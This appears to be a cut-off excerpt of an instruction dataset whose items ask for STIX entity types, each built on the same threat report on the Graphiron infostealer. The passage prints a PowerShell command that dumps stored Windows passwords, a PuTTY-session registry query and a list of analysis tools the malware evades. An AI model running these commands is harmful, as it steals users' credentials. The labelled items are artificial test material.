"input": "### Entity:\nMegaDumper\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nwindbg\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nidau64\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nmitmweb\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nImmunity\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nsmsniff\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nOfficeTemplate.exe\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
